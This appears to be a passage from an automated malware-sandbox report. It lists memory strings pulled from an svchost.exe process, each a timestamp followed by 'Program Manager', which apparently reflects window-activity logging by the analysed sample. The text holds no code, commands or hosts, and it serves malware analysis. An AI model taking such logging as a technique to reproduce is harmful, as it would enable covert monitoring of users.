              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 12:37:03 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 19:41:15 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:16:44 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 18:33:11 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 19:31:56 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 20:56:51 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:58:07 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:38:02 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 10:07:05 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:48:48 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 14:22:28 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:36:47 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:15:23 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:02:14 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:46:35 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:07:30 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:33:34 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:23:27 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:54:39 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:35:26 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:08:40 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:02:32 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:36:29 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/24 | 00:03:48 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:08:22 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:55:30 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:15:05 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:22:35 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:18:47 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:23:38 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:28:06 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:17:08 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:15:34 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:26:50 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:23:56 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:31:41 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:44:50 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:39:05 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:25:11 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:41:00 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:12:10 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:15:52 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:22:06 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:47:27 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:45:53 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:12:47 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:41:19 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:55:12 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:49:02 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:37:30 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:39:43 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:55:10 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:45:34 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:24:37 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:36:19 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:03:44 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 13:20:35 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 10:03:57 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:53:38 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 13:49:51 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 19:56:28 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:09:50 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 12:12:31 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:58:44 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:01:31 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 10:01:34 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:53:28 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:34:54 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:10:27 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:25:49 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:44:13 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:45:24 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:27:13 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:52:17 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:27:04 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:00:10 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 18:01:37 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:45:51 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:57:06 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:29:36 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:32:22 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:08:03 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:37:49 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 06:24:28 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 03:47:08 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 04:56:40 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 21:11:57 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 22:36:58 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 09:40:26 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 06:05:27 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 21:21:16 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 22:25:30 - Program Manager
Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/20 | 21:32:42 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 08:00:48 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 05:21:42 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 07:56:31 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 21:28:54 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 23:06:38 - Program Manager
Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/20 | 21:42:01 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 21:06:39 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 21:40:17 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 03:21:43 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 21:43:31 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 10:12:23 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 03:31:02 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 04:08:20 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 22:51:35 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 08:10:07 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 09:59:09 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 04:25:20 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 07:41:57 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 04:40:36 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 06:59:55 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 03:30:48 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 03:32:32 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 22:38:42 - Program Manager
Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/21 | 12:55:33 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 09:07:02 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 21:51:06 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 09:31:21 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 04:54:56 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 22:04:45 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 06:16:53 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/21 | 13:42:50 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 21:53:29 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 22:14:04 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 05:20:12 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 05:10:53 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 23:12:49 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 20:59:45 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 23:22:08 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 07:18:46 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 22:34:35 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 09:42:49 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 23:44:23 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 06:30:00 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 23:42:39 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 04:03:05 - Program Manager
Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/21 | 12:53:49 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 08:44:04 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 22:42:30 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 20:31:59 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 05:11:09 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 07:26:41 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 03:28:44 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 07:36:00 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 23:50:34 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 03:38:03 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 04:36:48 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 04:46:07 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 05:25:29 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 19:24:15 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/23 | 22:10:56 - Program Manager
Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 24/04/26 | 05:33:24 - Program Manager
